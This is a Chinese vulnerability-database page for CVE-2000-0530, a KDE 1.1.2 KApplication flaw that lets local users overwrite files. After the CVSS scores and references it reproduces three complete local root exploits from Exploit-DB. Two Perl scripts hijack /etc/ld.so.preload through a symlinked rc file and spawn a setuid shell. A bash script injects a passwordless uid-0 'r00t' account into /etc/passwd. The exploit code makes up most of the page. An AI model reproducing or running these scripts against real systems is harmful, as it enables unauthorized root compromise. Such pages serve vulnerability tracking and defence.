CVE-2000-0530
CVSS7.2
发布时间 :2000-05-31 00:00:00
修订时间 :2008-09-05 16:21:14
NMCOE    

[原文]The KApplication class in the KDE 1.1.2 configuration file management capability allows local users to overwrite arbitrary files.


[CNNVD]KDE 1.1.2 Kapplication任意文件覆盖漏洞(CNNVD-200005-110)

        KDE 1.1.2版本的配置文件管理功能中KApplication类允许本地用户覆盖任意文件。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:kde:kde:1.1.2
cpe:/o:caldera:openlinux:2.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0530
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0530
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200005-110
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/4583.php
(VENDOR_ADVISORY)  XF  kde-configuration-file-creation
http://www.securityfocus.com/bid/1291
(VENDOR_ADVISORY)  BID  1291
http://archives.neohapsis.com/archives/bugtraq/2000-05/0387.html
(VENDOR_ADVISORY)  BUGTRAQ  20000531 KDE::KApplication feature?
http://www.redhat.com/support/errata/RHSA-2000-032.html
(UNKNOWN)  REDHAT  RHSA-2000:032
ftp://ftp.calderasystems.com/pub/OpenLinux/security/CSSA-2000-015.0.txt
(UNKNOWN)  CALDERA  CSSA-2000-015.0

- 漏洞信息

KDE 1.1.2 Kapplication任意文件覆盖漏洞
高危 未知
2000-05-31 00:00:00 2005-05-02 00:00:00
本地  
        KDE 1.1.2版本的配置文件管理功能中KApplication类允许本地用户覆盖任意文件。

- 公告与补丁

        

- 漏洞信息 (19979)

KDE 1.1.2 KApplication configfile vulnerability (1) (EDBID:19979)
linux local
2000-05-31 Verified
0 kil3r
N/A [点击下载]
source: http://www.securityfocus.com/bid/1291/info

The KDE configuration-file management has a bug which could result in root compromise.

Due to insecure creation of configuration (rc) files via KApplication-class, local users can modify ownership of arbitrary files when running setuid root KDE-programs.

Properly exploited, this can permit a local attacker to change ownership of key system files, then write arbitrary data to them, allowing an elevation of privileges.

#!/usr/bin/perl

#
# 7350ktvision! The ktvision-hack. 
#
# Just execute. Gives instant rootshell kiddie!
# If only ktvision is setuid-root and vulnerable as with
# SuSE 6.4!
#
#
# Bugdiscovery is due to Sebastian Krahmer.
# http://www.cs.uni-potsdam.de/homepages/students/linuxer
#
# Greets as always to TESO, security.is, lam3rz ... you all
# know who you are.
#
# Special greets to that beautiful black-dressed woman at
# the bus stop. This one is for you. :)
# 

my $rcfile = $ENV{"HOME"}."/.kde/share/config/ktvisionrc";

$ENV{"PATH"}.=":/opt/kde/bin";

print ">>Get a feeling on GUI's and how secure they are.<< Stealth.\n";

print "Creating hijack-lib ...\n";
open O, ">/tmp/boom.c" or die "open(boom.c..)";
print O<<_EOF_;
#include <sys/types.h>

int time(void *v)
{
	chown("/tmp/boomsh", 0, 0);
	chmod("/tmp/boomsh", 06755);
	unlink("/etc/ld.so.preload");
	exit(1);
}
_EOF_
close O;

print "Compiling hijack-lib ...\n";
`cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
`cc -shared /tmp/boom.o -o /tmp/boom.so`;

open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
print O<<_EOF2_;
#include <stdio.h>
int main() 
{
    char *a[] = {"/bin/sh", 0};
    setuid(0); setregid(0, 0);
    execve(a[0], a, 0);
    return 0;
}
_EOF2_
close O;

print "Compile shell ...\n";
`cc /tmp/boomsh.c -o /tmp/boomsh`;

umask 0;

unlink $rcfile;
symlink "/etc/ld.so.preload", $rcfile;

print "Invoking vulnerable program (ktvision)...\n";

if (fork() == 0) {
	`ktvision`;
	exit 0;
} else {
	sleep(3);
	kill 9, `pidof ktvision`;
}

open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";
print O "/tmp/boom.so";
close O;
`/usr/bin/passwd`;

# let it look like if we have sth. to do. :)
sleep 3;
print "Welcome. But as always: BEHAVE!\n";
system("/tmp/boomsh");
		

- 漏洞信息 (19980)

KDE 1.1.2 KApplication configfile vulnerability (2) (EDBID:19980)
linux local
2000-05-31 Verified
0 kil3r
N/A [点击下载]
source: http://www.securityfocus.com/bid/1291/info
 
The KDE configuration-file management has a bug which could result in root compromise.
 
Due to insecure creation of configuration (rc) files via KApplication-class, local users can modify ownership of arbitrary files when running setuid root KDE-programs.
 
Properly exploited, this can permit a local attacker to change ownership of key system files, then write arbitrary data to them, allowing an elevation of privileges.

#!/usr/bin/perl

#
# 7350ktuner! The ktuner-hack. 
# (a.k.a. kil3r for some reason :)
#
# Just execute. Gives instant rootshell kiddie!
# If only ktuner is setuid-root and vulnerable as with
# SuSE 6.4!
#
# When has this stupid race an end?
#
# Bugdiscovery is due to Sebastian Krahmer.
# http://www.cs.uni-potsdam.de/homepages/students/linuxer
#
#
# Greets as always to TESO, security.is, lam3rz ... you all
# know who you are.
#
# 

my $rcfile = $ENV{"HOME"}."/.kde/share/config/ktunerrc";

$ENV{"PATH"}.=":/opt/kde/bin";

print ">>Get a feeling on GUI's and how secure they are.<< Stealth.\n";

print "Creating hijack-lib ...\n";
open O, ">/tmp/boom.c" or die "open(boom.c..)";
print O<<_EOF_;
#include <sys/types.h>

int time(void *v)
{
	chown("/tmp/boomsh", 0, 0);
	chmod("/tmp/boomsh", 06755);
	unlink("/etc/ld.so.preload");
	exit(1);
}
_EOF_
close O;

print "Compiling hijack-lib ...\n";
`cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
`cc -shared /tmp/boom.o -o /tmp/boom.so`;

open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
print O<<_EOF2_;
#include <stdio.h>
int main() 
{
    char *a[] = {"/bin/sh", 0};
    setuid(0); setregid(0, 0);
    execve(a[0], a, 0);
    return 0;
}
_EOF2_
close O;

print "Compile shell ...\n";
`cc /tmp/boomsh.c -o /tmp/boomsh`;

umask 0;

unlink $rcfile;
symlink "/etc/ld.so.preload", $rcfile;

print "Invoking vulnerable program (ktuner)...\n";

if (fork() == 0) {
	`ktuner`;
	exit 0;
} else {
	sleep(3);
	kill 9, `pidof ktuner`;
}

open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";
print O "/tmp/boom.so";
close O;
`/usr/bin/passwd`;

# let it look like if we have sth. to do. :)
sleep 3;
print "Welcome. But as always: BEHAVE!\n";
system("/tmp/boomsh");
		

- 漏洞信息 (19981)

KDE 1.1.2 KApplication configfile vulnerability (3) (EDBID:19981)
linux local
2000-05-31 Verified
0 IhaQueR
N/A [点击下载]
source: http://www.securityfocus.com/bid/1291/info
  
The KDE configuration-file management has a bug which could result in root compromise.
  
Due to insecure creation of configuration (rc) files via KApplication-class, local users can modify ownership of arbitrary files when running setuid root KDE-programs.
  
Properly exploited, this can permit a local attacker to change ownership of key system files, then write arbitrary data to them, allowing an elevation of privileges.


#!/bin/bash

link=/home/paul/.kde/share/config
linkto=/etc/passwd
target=/opt/kde/bin/ktvision

echo ""
echo "KTVision <= 0.1.1-271 local r00t exploit by IhaQueR"
echo ""

if ! test -u $target ; then
        echo "[-] $target not found"
        exit 1
fi;

echo "[+] $target found"

rm -f sush*
cat <<__DUPA__>>sush.c
#include <stdio.h>
main()
{
        setuid(geteuid());
        setgid(getegid());
        execl("/bin/bash", "/bin/bash", NULL);
}
__DUPA__

echo "    compiling sush"
res=$(gcc sush.c -o sush)

if test "$res" != "" -o ! -x sush ; then
        echo "[-] failed"
        rm sush* ktvback.*
        exit 2;
fi;

echo "[+] success"

cp $linkto ktvback.$$
mkdir -p $link
rm -f $link/ktvisionrc
ln -s $linkto $link/ktvisionrc

echo ""
echo -n "now running... (ensure that X is up and running)"

$target >/dev/null 2>&1 &
cpid=$!

declare -i cnt
declare -i max
cnt=0
max=60

while ! test -O $linkto ; do
        sleep 1;
        printf "  %.2d" $cnt
        cnt=$(($cnt+1))
        if test $cnt -ge $max ; then
                echo ""
                echo ""
                echo "[-] FAILED"
                rm sush* ktvback.*
                exit 2;
        fi;
done;

kill -9 $cpid >/dev/null 2>&1
rm $link/ktvisionrc

echo ""
echo ""
echo "[+] SUCCESS, creating sush"
echo >>$linkto "r00t::0:0:root:/root:/bin/bash"
echo ""
su r00t -c "chown 0.0 sush; chmod u+s sush; chmod g+s sush; cp
ktvback.$$ $linkto; chown 0.0 $linkto"
rm ktvback.* sush.c

if ! test -u sush ; then
        echo "    hm strange error"
        rm sush* ktvback.*
        exit 1
fi;

echo ""
echo "starting ./sush"
./sush

#!plonk
		

- 漏洞信息

1372
KDE KApplication-class Program Arbitrary File Creation
Local Access Required Input Manipulation
Loss of Integrity Third-Party Solution
Exploit Public Third-party Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2000-05-31 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站